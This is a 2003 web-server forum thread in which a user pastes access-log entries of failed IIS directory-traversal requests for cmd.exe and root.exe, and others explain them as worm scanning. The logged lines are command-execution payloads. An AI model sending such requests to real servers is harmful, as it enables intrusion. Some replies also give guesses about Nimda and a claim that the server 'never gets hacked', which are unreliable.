View previous topic :: View next topic |
Author |
Message |
datwig -
Joined: 26 Jan 2003 Posts: 85
|
Posted: Fri Feb 28, 2003 7:10 am Post subject: Am I being "hacked"? |
|
|
OK, there is this weird... stuff in my access.log Code: | 208.163.143.9 - - [27/Feb/2003:21:59:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:24 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:24 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:25 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
208.163.143.9 - - [27/Feb/2003:21:59:26 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:27 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:28 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:30 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:31 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:32 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:34 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
208.163.143.9 - - [27/Feb/2003:21:59:35 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 |
Am I being hacked? That wasn't/isn't my IP. |
|
Back to top |
|
|
tv2Rob -
Joined: 13 Feb 2003 Posts: 37
|
Posted: Fri Feb 28, 2003 7:18 am Post subject: |
|
|
No. you are not being "hacked" that's just a server somewhere... still spreading this kind of useless traffic...note the 404 and 400 meaning your server can not and will not give it what it wants. we call things like this code red and stuff...don't worry it won't harm your computer, but it is a reminder to always keep up to date with critical security patches from MS. :wink: |
|
Back to top |
|
|
Dave -
Joined: 11 Feb 2003 Posts: 184 Location: United Kingdom
|
Posted: Fri Feb 28, 2003 10:11 am Post subject: |
|
|
Like tv2Rob mentioned, it could indeed be a server, or it could indeed be a hacker, however needless to say either way dont be too concerned, the hacker, if it were a hacker, he/she failed :D _________________ Any information contained herein is provided in "as is" condition without any guarantee for its accuracy, contains no warrantees - express or implied - and confers no rights.
X1 1.1.4: http://www.aprelium.com/news/abwsx1u1.html |
|
Back to top |
|
|
datwig -
Joined: 26 Jan 2003 Posts: 85
|
Posted: Sat Mar 01, 2003 12:34 am Post subject: |
|
|
Dave wrote: | Like tv2Rob mentioned, it could indeed be a server, or it could indeed be a hacker, however needless to say either way dont be too concerned, the hacker, if it were a hacker, he/she failed :D | HAha! he/she failed... well anyway I'm releived, thanks! |
|
Back to top |
|
|
os17fan -
Joined: 21 Mar 2003 Posts: 531 Location: USA
|
Posted: Sun Apr 06, 2003 7:02 am Post subject: |
|
|
I think that line of code is caused by the Nimda virus because Nimda is a virus that attaches to a code on your server and can infect your files and also slow down your internet connection do not leave your web server on if you see this code just stop it and find a way to patch it so it cannot catch Nimda , I don't know alot about Nimda but I sure did talk to someone and im pretty sure its Nimda so be careful and find a way to patch your web server so you don't catch it 8) _________________ This web server is the best ! |
|
Back to top |
|
|
os17fan -
Joined: 21 Mar 2003 Posts: 531 Location: USA
|
Posted: Tue Jun 03, 2003 2:21 am Post subject: |
|
|
Im sorry just in, that line of code is not Nimda ! leave your web server on if you want , Abyss never gets hacked 8) _________________ This web server is the best ! |
|
Back to top |
|
|
CapFusion -
Joined: 18 May 2003 Posts: 617 Location: Lost in Abyss' Dungeon
|
Posted: Thu Jun 05, 2003 6:14 pm Post subject: |
|
|
os17fan wrote: | Im sorry just in, that line of code is not Nimda ! leave your web server on if you want , Abyss never gets hacked 8) |
Heeheehe..... Do not say that.... :D Actually it can get hack. Everything can get hack if that hacker is very good or presistance. I have try with my old XT PC and let it hammer away. You can read me old post - http://www.aprelium.com/forum/viewtopic.php?t=1660
Just wish Aprelium can have some additional precaution like IP ban or DOS etc...
Anway, those error log are very common for those have Webserver or similar server. Just aslong the security patches is update, it should not be too bad. Only those PC were not update will have problem especial those using IIS. _________________ CapFusion,... |
|
Back to top |
|
|
|